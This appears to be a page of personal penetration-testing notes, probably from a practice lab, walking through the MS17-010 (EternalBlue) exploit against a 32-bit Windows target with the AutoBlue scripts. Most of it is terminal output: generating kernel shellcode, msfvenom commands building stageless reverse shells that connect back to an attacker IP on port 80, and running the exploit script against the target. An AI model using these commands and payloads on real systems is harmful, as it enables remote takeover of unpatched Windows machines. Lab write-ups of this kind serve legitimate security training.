Exploitation

GitHub - 3ndG4me/AutoBlue-MS17-010: This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010GitHub

This is without metasploit because anyways the Metasploit Module only supports 64-bit systems. We got a Windows 7 SP1 32-bit Based system.

Steps:

After cloning the github repo, go to the shellcode direcotry and generate the shellcode.

╭─      /home/k/I/r/192.168.100.40/exploit/AutoBlue-MS17-010/shellcode     master ?1 ▓▒░──░▒▓ ✔  root@kali 
╰─ ./shell_prep.sh          
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
192.168.49.227
LPORT you want x64 to listen on:
80
LPORT you want x86 to listen on:
80
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.49.227 LPORT=80
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.49.227 LPORT=80
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

Notice the different shellcode generated.

ls
eternalblue_kshellcode_x64.asm  sc_all.bin         sc_x64_msf.bin     sc_x86_msf.bin
eternalblue_kshellcode_x86.asm  sc_x64.bin         sc_x86.bin         shell_prep.sh
eternalblue_sc_merge.py         sc_x64_kernel.bin  sc_x86_kernel.bin

The one we need is either

scx86.bin or sc_x86_msf.bin

Depending on whether we want to listen on the multi/handler or simple netcat. In my case I ran the exploit with the sc_x86.bin shellcode because I was only looking to use netcat to listen.

python3 eternalblue_exploit7.py 192.168.227.40 shellcode/sc_x86.bin
shellcode size: 962
numGroomConn: 13
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

PreviousRPC

Last updated 3 years ago